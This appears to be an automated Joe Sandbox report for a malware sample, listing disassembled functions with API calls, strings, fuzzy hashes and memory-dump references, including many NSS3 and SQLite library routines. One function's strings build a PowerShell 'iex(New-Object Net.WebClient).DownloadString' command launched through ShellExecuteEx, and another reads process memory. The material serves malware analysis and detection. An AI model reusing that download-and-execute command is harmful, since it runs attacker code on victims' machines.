Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: ByteCharMultiWidefree$Alloc_UtilValue_waccessmalloc
String ID:
API String ID: 3520324648-0
Opcode ID: 6a39b6fc9bdbc0a75b55c1430e44cb63e0c66fac411280204b2d8c7578c7740c
Instruction ID: 8ad51e115ea7e917f6e9685071fa8e38398fe94eca8eafc63673f218651943dc
Opcode Fuzzy Hash: 6a39b6fc9bdbc0a75b55c1430e44cb63e0c66fac411280204b2d8c7578c7740c
Instruction Fuzzy Hash: C701DEB27052127BFF101B699C19E3B365CEB896AAB100121FD19C6681EEB1C8408AF1

Function 6CF6C4E0 Relevance: 9.1, APIs: 6, Instructions: 52COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CF6C4F0
free.MOZGLUE ref: 6CF6C51A
TlsSetValue.KERNEL32 ref: 6CF6C540
free.MOZGLUE ref: 6CF6C557
DeleteCriticalSection.KERNEL32 ref: 6CF6C56A
free.MOZGLUE ref: 6CF6C576

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: free$Value$CriticalDeleteSection
String ID:
API String ID: 195087141-0
Opcode ID: cec9a02222171c5272bb9b1727417341b0c7f2096370d3b0ce1da1482d7dc3a1
Instruction ID: de4f1bc326160fb4a0ef837f0dd99f947e22eb68454b2832caf1578ceb8c90d9
Opcode Fuzzy Hash: cec9a02222171c5272bb9b1727417341b0c7f2096370d3b0ce1da1482d7dc3a1
Instruction Fuzzy Hash: DC113074804B508BDB10BF7AC44865EBFF4FF49749F454A2EE8C687A00EB349494CB96

Function 0041CD0E Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041CD1A

Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0

__amsg_exit.LIBCMT ref: 0041CD3A
__lock.LIBCMT ref: 0041CD4A
InterlockedDecrement.KERNEL32(?), ref: 0041CD67
free.MSVCRT ref: 0041CD7A
InterlockedIncrement.KERNEL32(0042C558), ref: 0041CD92

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lockfree
String ID:
API String ID: 634100517-0
Opcode ID: 7d16a1e83ff58dfdb830fc8266c4bafa6f0afd5e7dded616e769d1c33b91eb46
Instruction ID: 81166cf5a2c435bb4aac1af76a8190dca09a737386ef4d0c79be19083c51ecfa
Opcode Fuzzy Hash: 7d16a1e83ff58dfdb830fc8266c4bafa6f0afd5e7dded616e769d1c33b91eb46
Instruction Fuzzy Hash: C2018835A817219BC721AB6AACC57DE7B60BF04714F55412BE80467790C73CA9C1CBDD

Function 6CF8E520 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(00000000,?,?,6CF97F5D,00000000,00000000,?,?,?,6CF980DD), ref: 6CF8E532

Part of subcall function 6D049090: TlsGetValue.KERNEL32 ref: 6D0490AB
Part of subcall function 6D049090: TlsGetValue.KERNEL32 ref: 6D0490C9
Part of subcall function 6D049090: EnterCriticalSection.KERNEL32 ref: 6D0490E5
Part of subcall function 6D049090: TlsGetValue.KERNEL32 ref: 6D049116
Part of subcall function 6D049090: LeaveCriticalSection.KERNEL32 ref: 6D04913F

PR_EnterMonitor.NSS3(6CF980DD), ref: 6CF8E549

Part of subcall function 6D049090: LeaveCriticalSection.KERNEL32 ref: 6D0491AA
Part of subcall function 6D049090: TlsGetValue.KERNEL32 ref: 6D049212
Part of subcall function 6D049090: _PR_MD_WAIT_CV.NSS3 ref: 6D04926B

PR_ExitMonitor.NSS3 ref: 6CF8E56D
PL_HashTableDestroy.NSS3 ref: 6CF8E57B

Part of subcall function 6CF8E190: PR_EnterMonitor.NSS3(?,?,6CF8E175), ref: 6CF8E19C
Part of subcall function 6CF8E190: PR_EnterMonitor.NSS3(6CF8E175), ref: 6CF8E1AA
Part of subcall function 6CF8E190: PR_ExitMonitor.NSS3 ref: 6CF8E208
Part of subcall function 6CF8E190: PL_HashTableRemove.NSS3(?), ref: 6CF8E219
Part of subcall function 6CF8E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CF8E231
Part of subcall function 6CF8E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CF8E249
Part of subcall function 6CF8E190: PR_ExitMonitor.NSS3 ref: 6CF8E257

PR_ExitMonitor.NSS3(6CF980DD), ref: 6CF8E5B5
PR_DestroyMonitor.NSS3 ref: 6CF8E5C3

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: Monitor$Enter$ExitValue$CriticalSection$Arena_DestroyFreeHashLeaveTableUtil$Remove
String ID:
API String ID: 3740585915-0
Opcode ID: 1e4368427468829e130258bc38574a67ffa6e67ccb3b28d58639238a6e25f895
Instruction ID: ebba866686d3b188082e51da1b8f008374af5f25b013c9b14dd93f947e42623b
Opcode Fuzzy Hash: 1e4368427468829e130258bc38574a67ffa6e67ccb3b28d58639238a6e25f895
Instruction Fuzzy Hash: 0B0169B6C19200CBEE009B66E901B673BB4B706E4CF045037D80482662FF315564EBC2

Function 6CF0E6D0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 194COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?), ref: 6CF0E81D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010966,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6CF0DB91,?,?), ref: 6CF0E8E7

Strings

database corruption, xrefs: 6CF0E8DB
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF0E8C5, 6CF0E8D1, 6CF0E8F9, 6CF0E905, 6CF0E911, 6CF0E91D, 6CF0E929, 6CF0E935
%s at line %d of [%.10s], xrefs: 6CF0E8E0

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 3107271255-598938438
Opcode ID: 25a7f0ca390579ebf7e884c80c94e1f687f6819868feea2390220ae348bee8ab
Instruction ID: c5a9ebd318d89c0cc0e80a73b7fbe1376911b7164fcb0386c7a41b0844294431
Opcode Fuzzy Hash: 25a7f0ca390579ebf7e884c80c94e1f687f6819868feea2390220ae348bee8ab
Instruction Fuzzy Hash: 7771C271E082299FDB14CF9DC4A0AEEB7F0BB49714F14416AE894B7A42D370E944DBA1

Function 00417180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 0041719F
??_U@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,0041741A,00000000,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000), ref: 004171CD

Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E61
Part of subcall function 00416E50: strlen.MSVCRT ref: 00416E85

VirtualQueryEx.KERNEL32(0041758D,00000000,?,0000001C), ref: 00417212
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041741A), ref: 00417333

Part of subcall function 00417060: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 00417078

Strings

@, xrefs: 00417226

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @
API String ID: 2950663791-2766056989
Opcode ID: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
Instruction ID: d4c246fcbb90b677cbfa603dc812bd51b07a2c71a26f71c1c9cdc23e16c3c5e2
Opcode Fuzzy Hash: fb37d5dfae784a160399b72835e1c1bb9686aa045b5c8bb6ae6988575cdfbf40
Instruction Fuzzy Hash: CD5106B5E04109EBDB08CF98D981AEFB7B6BF88300F148159F915A7340D738AA41DBA5

Function 00406A00 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 155libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,00406E7A), ref: 00406A69

Strings

zn@, xrefs: 00406A0D, 00406A19, 00406A2C, 00406A35, 00406A59, 00406A82, 00406A85, 00406B3F, 00406B51, 00406B5D, 00406B66, 00406BE3, 00406B99, 00406A9A, 00406ABD, 00406AC9, 00406AF1, 00406B21, 00406B33, 00406AFD, 00406B0A, 00406AA6
zn@, xrefs: 00406B78, 00406C06, 00406C0B, 00406BB5

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: zn@$zn@
API String ID: 1029625771-1156428846
Opcode ID: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
Instruction ID: 56bd16fc9bcf92c18956b4b249a59c76870f8c01999fa8d2962da2cd55bb9a52
Opcode Fuzzy Hash: 3fc5a8dedeb49d1d19b08a8b2b74cc72c2b475cc3767d007be69e7bc9d832ffb
Instruction Fuzzy Hash: C571D874A04109DFDB04CF48C494BAAB7B1FF88305F158179E84AAF395C739AA91CF95

Function 00412EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

ShellExecuteEx.SHELL32(0000003C), ref: 00412FD5

Strings

<, xrefs: 00412F89
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00412F14
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00412F54
')", xrefs: 00412F03

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: 6438c227cae965f49339e3d8f7f9342d8f6435021a2bb5adb59d37600b72edc2
Instruction ID: fa4238ec13a9909d2a06eabaeedbec9afd3c4d5d27ba3f2f176ac5e057c61c04
Opcode Fuzzy Hash: 6438c227cae965f49339e3d8f7f9342d8f6435021a2bb5adb59d37600b72edc2
Instruction Fuzzy Hash: DB415E70E011089ADB04EFA1D866BEDBB79AF10314F40445EF10277196EF782AD9CF99

Function 6CF0E4C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108D2,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF0E53A
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108BD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF0E5BC

Strings

database corruption, xrefs: 6CF0E52F, 6CF0E5B1
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF0E525, 6CF0E596, 6CF0E5A7
%s at line %d of [%.10s], xrefs: 6CF0E534, 6CF0E5B6

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 0f11853ab4ea631062d5617dc59413c479fb857c929948627850f1d22ec4dd85
Instruction ID: e71c5c40a9dc494f9ca796ac2ca62a31cf152f935f8a8a27c2608f263b983373
Opcode Fuzzy Hash: 0f11853ab4ea631062d5617dc59413c479fb857c929948627850f1d22ec4dd85
Instruction Fuzzy Hash: 01315531B007149BD7118EADC8A0A7BB7A0EB85B14B540D7CE888E7782F371E949C7E0

Function 6CFF6DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6CFF6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFF6E57

Part of subcall function 6D02C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D02C2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6CFF6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6CFF6EAA

Strings

nm, xrefs: 6CFF6DF9

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID: nm
API String ID: 3163584228-1139673764
Opcode ID: 9e2047ceed0068193765095047695f6eb5eecc463db3c4eba1efaf6c78031dc3
Instruction ID: 5e7373ab983e711c4aff4fdd39320eb68888da2050d2ceb2d3cb378788e9a887
Opcode Fuzzy Hash: 9e2047ceed0068193765095047695f6eb5eecc463db3c4eba1efaf6c78031dc3
Instruction Fuzzy Hash: 8331FD33614612EADB141F34DC04397B7A0EB0131AF20063CE8AAD3AA0EF31A856CF85

Function 6CF70DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6CF70BDE), ref: 6CF70DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6CF70BDE), ref: 6CF70DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6CF70BDE), ref: 6CF70DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6CF70BDE), ref: 6CF70E32

Strings

%s incr => %d (find lib), xrefs: 6CF70E2D

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: ff2708c1e7f7291fc7ffe0ea86ba87aa7afba0b0dc53f9c3831f6608ada6af75
Instruction ID: 6fa444d0f9c3fffd08fa97aa8d4886bd498413f799740eb234897aaa69c29c64
Opcode Fuzzy Hash: ff2708c1e7f7291fc7ffe0ea86ba87aa7afba0b0dc53f9c3831f6608ada6af75
Instruction Fuzzy Hash: D801D4726002149FE6208F25AC45F1773ACDF45A19B15446EE909D7682E7A2FC1486A1

Function 6CFB2520 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetFunctionList), ref: 6CFB2538
PR_LogPrint.NSS3( ppFunctionList = 0x%p,?), ref: 6CFB2551

Part of subcall function 6D0909D0: PR_Now.NSS3 ref: 6D090A22
Part of subcall function 6D0909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6D090A35
Part of subcall function 6D0909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6D090A66
Part of subcall function 6D0909D0: PR_GetCurrentThread.NSS3 ref: 6D090A70
Part of subcall function 6D0909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6D090A9D
Part of subcall function 6D0909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6D090AC8
Part of subcall function 6D0909D0: PR_vsmprintf.NSS3(?,?), ref: 6D090AE8
Part of subcall function 6D0909D0: EnterCriticalSection.KERNEL32(?), ref: 6D090B19
Part of subcall function 6D0909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D090B48
Part of subcall function 6D0909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D090C76
Part of subcall function 6D0909D0: PR_LogFlush.NSS3 ref: 6D090C7E

Strings

ppFunctionList = 0x%p, xrefs: 6CFB254C
C_GetFunctionList, xrefs: 6CFB2533
nm, xrefs: 6CFB2569, 6CFB2590

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.1798906357.000000006CF00000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799137014.000000006D09F000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799195526.000000006D0DE000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799219072.000000006D0DF000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799243268.000000006D0E0000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000000.00000002.1799266994.000000006D0E5000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_HrxOpVxK5d.jbxd

Similarity

API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
String ID: ppFunctionList = 0x%p$C_GetFunctionList$nm
API String ID: 1907330108-1861517451
Opcode ID: 9283e86fa8b34ed8869c8ff51c72026981ebbc72093771f25ebf745f51d5112d
Instruction ID: 1df77a1e2b4f44d620d8649ef92250fa347e576823a9a5d33714dd79e72190f2
Opcode Fuzzy Hash: 9283e86fa8b34ed8869c8ff51c72026981ebbc72093771f25ebf745f51d5112d
Instruction Fuzzy Hash: 7E012479504001DFEB249B3ADD4CB5933B1EB82B19F084029E508E3251DF35D949CBA2

Function 6CFCC590 Relevance: 7.7, APIs: 5, Instructions: 155COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6CFCC5C7
PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6CFCC603
PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6CFCC636
PK11_FreeSymKey.NSS3(?), ref: 6CFCC6D7
PK11_FreeSymKey.NSS3(?), ref: 6CFCC6E1

Memory Dump Source

Source File: 00000000.00000002.1798960247.000000006CF01000.00000020.00000001.01000000.00000012.sdmp, Offset: 6CF00000, based on PE: true

